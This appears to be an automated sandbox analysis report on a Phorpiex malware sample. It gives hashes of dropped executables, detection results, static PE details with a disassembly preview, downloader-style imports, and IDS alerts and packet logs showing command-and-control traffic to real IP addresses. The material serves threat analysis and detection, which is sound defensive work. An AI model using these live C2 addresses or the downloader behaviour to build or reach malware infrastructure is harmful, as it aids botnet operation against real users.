File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.395514880379391
Encrypted:	false
SSDEEP:	1536:9EKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:iKlWOpsG8MviYEHK
MD5:	CD1D9C0ED8763E6BB3EE7EFB133DC60E
SHA1:	F6F3BEA085BA7C13A2956FC0810C2034792F2DDF
SHA-256:	19EE79B7852C54DE5883404F049F9E85CB0085BAE8132ADA3E46D6F75B24B100
SHA-512:	77B675FDBFC11BFF45E2438CB1BD73B7FBFA03771C600E37171F684141C82F356E392BA2694285390AEDBB3ECD3306A3C0F8687D0A1940D8D44CAE3A7FC41591
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1682018248.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L...=$(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\sysvratrel.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\135143440.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.395549483776685
Encrypted:	false
SSDEEP:	1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
MD5:	36010B83BCCFCD1032971DF9FC5082A1
SHA1:	9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
SHA-256:	99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
SHA-512:	C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\tbtnds.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\135143440.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.816605532319396
Encrypted:	false
SSDEEP:	96:IGTlA8/YYd48cUlqcO4BtyA2ByJ5G+vt9OobxUql79/a0cpHtM:TACXd48onGytA7G+iULRcA
MD5:	55F401E27EFE1D5F29FCB6DE0A214763
SHA1:	2FD6DE82580EF483B0BDD3BF410C0EDBF97C852B
SHA-256:	DDF7AADA209F1C9FB3FB12ADF3F424F160C08D4B3188DF082122C6BE85E63DA0
SHA-512:	F154C8F3DA4C18204F1957FEF6D2270996CF2B3FB475C9AD275F69D137B1F178CD3C0ECF0F80CCE28FDBFF75991D03A400A3C36992060A8105FF286DA95FA04E
Malicious:	false
Reputation:	low
Preview:	_:......P.+n......X.....Y..G....T5.j...._........#+q.....................$j.....[.......N....X..j......,.......Q....\/......_;.......#............._;....................[.:.....F5.....m..................F....W.......%..6....m>.O......Z..............Lv.......~....W..A....\/\|6....P........A.................I......yQ....%c6.....mJE+...._;.......".....N'......R..(....M,.......m.....T.H.....<.........E......."......q......dc.............x.c......#......^.......N'.j....%..%.....?L&...................>......%.........vR....Y..j....Y.xR.....u........i......>......?]>............X.N....]vc.............N&k.......I......................B......`......lM........8....\.......N'.)....%.........\|>....]..E......^.......9V.....x........C............._9.r....M.).....Y.......\/.3.....?F^......:.....-..z....PP.Y....%x......_.W...........Y.5n.............................Q.............x......_;......R.......g.M.....U.V.....Yj.:....N'.6....^.Ez....\\|......[\.g.....Y......Y.>.....;[.s....

C:\Windows\sysvratrel.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\135143440.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.395549483776685
Encrypted:	false
SSDEEP:	1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
MD5:	36010B83BCCFCD1032971DF9FC5082A1
SHA1:	9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
SHA-256:	99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
SHA-512:	C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 65%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.126377670630054
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	957C4XK6Lt.exe
File size:	10'240 bytes
MD5:	f33c75710d0e0463a2528e619c2ee382
SHA1:	4d2dd071fe274e6a8696448c21eeeecc0cf07e6d
SHA256:	ec7dd08d03d5d4142c82fc04cea7e948d05641b0a3008a0d8a00b0421b5b04f9
SHA512:	154242d9880aa6a4f56e697643da089db121fcb1fb8fe7748efed650a6446d259be45aa58ec76f447d2c4bb5649f01acd2304d86321ec8720dfa1182ce0d5bfe
SSDEEP:	96:zMCbgvMlD60OX6QRdR/9DCop+BYA8v1cVKV15uJxGE9YUBz2qh3C7tCEfq:AeNlD5wrldp+OF0JxTmUBzthc
TLSH:	73221B07FD8B4020D3E148F017B59B8A8BBD49B3178671DBF3B3D48A4FA43519426AE6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L... .'f...................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40177f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6627BA20 [Tue Apr 23 13:39:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7fda7734b056db13fe95f35927509e47

Entrypoint Preview

Instruction
call 00007F2D5D54A9E9h
jmp 00007F2D5D54A3ABh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007F2D5D54A69Ch
cmp dword ptr [eax+10h], 03h
jne 00007F2D5D54A696h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007F2D5D54A687h
cmp eax, 19930521h
je 00007F2D5D54A680h
cmp eax, 19930522h
je 00007F2D5D54A679h
cmp eax, 01994000h
jne 00007F2D5D54A677h
call 00007F2D5D54AA3Eh
xor eax, eax
pop ebp
retn 0004h
push 00401789h
call dword ptr [00402000h]
xor eax, eax
ret
int3
jmp dword ptr [004020B4h]
push 00000014h
push 00402430h
call 00007F2D5D54A8D5h
push dword ptr [00403384h]
mov esi, dword ptr [0040206Ch]
call esi
pop ecx
mov dword ptr [ebp-1Ch], eax
cmp eax, FFFFFFFFh
jne 00007F2D5D54A67Eh
push dword ptr [ebp+08h]
call dword ptr [00402068h]
pop ecx
jmp 00007F2D5D54A6D9h
push 00000008h
call 00007F2D5D54A9FFh
pop ecx
and dword ptr [ebp-04h], 00000000h
push dword ptr [00403384h]
call esi
mov dword ptr [ebp-1Ch], eax
push dword ptr [00403380h]
call esi
pop ecx
pop ecx
mov dword ptr [ebp-20h], eax
lea eax, dword ptr [ebp-20h]
push eax
lea eax, dword ptr [ebp-1Ch]
push eax
push dword ptr [ebp+08h]
mov esi, dword ptr [00402060h]
call esi

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[IMP] VS2005 build 50727
[C++] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x246c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5000	0x1a4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x23a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcda	0xe00	8d36f92c14b086882f6b7735a7484a58	False	0.5666852678571429	data	5.744853860221389	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0xa34	0xc00	4e31adba47e95651616ff672a128ee58	False	0.42578125	data	4.356940393520815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0x38c	0x200	202a0f14ba4a024e6a35d5895669b769	False	0.060546875	data	0.35275948821577235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4000	0x2b0	0x400	554d0cedd69e96ee00c8324ce4da604c	False	0.3623046875	data	5.194459669718395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5000	0x20a	0x400	81547cdc12e70629c49fae8dfec2b87b	False	0.4189453125	data	3.4342282719525072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4058	0x256	ASCII text, with CRLF line terminators	English	United States	0.5100334448160535

Imports

DLL	Import
SHLWAPI.dll	PathFileExistsW
MSVCR90.dll	__set_app_type, ?terminate@@YAXXZ, _unlock, _encode_pointer, _lock, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, __dllonexit, _crt_debugger_hook
WININET.dll	InternetOpenA, InternetOpenUrlA, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle
urlmon.dll	URLDownloadToFileW
KERNEL32.dll	SetUnhandledExceptionFilter, GetStartupInfoA, GetTickCount, ExpandEnvironmentStringsW, CreateFileW, WriteFile, CloseHandle, DeleteFileW, CreateProcessW, Sleep, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, InterlockedCompareExchange, InterlockedExchange
USER32.dll	wsprintfW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-10:09:33.285933	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	212.112.112.84
04/24/24-10:07:51.958250	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	186.94.185.219
04/24/24-10:06:57.287872	UDP	2856563	ETPRO TROJAN Phorpiex Domain in DNS Lookup	59936	53	192.168.2.6	1.1.1.1
04/24/24-10:10:13.394595	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	92.46.174.254
04/24/24-10:08:32.035369	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	217.20.222.188
04/24/24-10:07:11.867133	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	120.237.99.181
04/24/24-10:09:58.363225	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	46.35.86.48
04/24/24-10:09:23.285105	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	89.219.115.32
04/24/24-10:09:48.347692	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	181.114.188.143
04/24/24-10:07:31.911742	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	95.71.69.217
04/24/24-10:08:11.988207	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	39.53.75.107
04/24/24-10:09:53.363437	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	89.236.226.70
04/24/24-10:07:46.957752	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	2.180.157.70
04/24/24-10:09:18.287284	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	151.233.73.168
04/24/24-10:07:56.957867	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	197.148.34.173
04/24/24-10:07:26.909948	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	82.114.186.50
04/24/24-10:08:48.239817	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	41.102.227.47
04/24/24-10:08:01.978212	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	5.200.190.214
04/24/24-10:07:21.863771	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	5.200.152.6
04/24/24-10:10:48.476371	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	2.191.221.216
04/24/24-10:10:53.507363	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	189.158.148.85
04/24/24-10:10:43.459613	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	134.35.81.188
04/24/24-10:10:18.414506	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	31.186.49.163
04/24/24-10:08:58.253867	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	2.185.146.181
04/24/24-10:10:23.425986	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	5.251.56.144
04/24/24-10:07:16.864431	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	85.113.19.18
04/24/24-10:10:03.378900	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	2.190.224.61
04/24/24-10:08:43.222645	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	91.234.219.185
04/24/24-10:08:53.254442	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	134.35.74.170
04/24/24-10:10:33.442451	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	5.233.222.244
04/24/24-10:08:22.004023	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	95.58.18.206
04/24/24-10:09:28.285044	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	128.65.176.18
04/24/24-10:09:43.348638	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	92.47.124.54
04/24/24-10:10:58.504112	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	134.35.163.241
04/24/24-10:10:28.442260	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	134.35.173.140
04/24/24-10:09:13.269540	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	37.20.161.137
04/24/24-10:07:41.942141	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	36.20.68.95
04/24/24-10:08:27.019326	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	31.186.54.5
04/24/24-10:08:16.989023	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	89.218.235.182
04/24/24-10:09:03.253978	UDP	2044077	ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC	59141	40500	192.168.2.6	82.194.11.2

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:06:57.466809034 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:57.805700064 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:57.805789948 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:57.806061029 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146322966 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146378994 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146421909 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146450043 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146461010 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146465063 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146500111 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146507978 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146538019 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146548986 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146574974 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146584988 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146612883 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146621943 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146650076 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146656036 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146687031 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146694899 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146724939 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.146729946 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.146771908 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485579014 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485640049 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485680103 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485719919 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485754013 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485785007 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485784054 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485821962 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485822916 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485860109 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485863924 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485886097 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485901117 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485913038 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485939026 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485955000 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.485976934 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.485989094 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486013889 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486030102 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486053944 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486064911 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486093044 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486108065 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486130953 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486140013 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486170053 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486196041 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486207008 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486211061 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486244917 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486249924 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486284018 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486295938 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486321926 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486346960 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486360073 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.486367941 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.486453056 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824354887 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824419975 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824459076 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824481964 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824497938 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824551105 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824645996 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824664116 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824744940 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824758053 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824783087 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824810028 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824822903 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824853897 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824861050 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824898005 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.824903011 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.824956894 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825099945 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825153112 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825197935 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825236082 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825242996 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825273037 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825280905 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825310946 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825318098 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825346947 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825356960 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825385094 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825391054 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825423002 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825443029 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825459957 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825460911 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825495005 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825500965 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825531960 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825536966 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825570107 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.825573921 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.825617075 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.826853991 CEST	80	49710	185.215.113.66	192.168.2.6
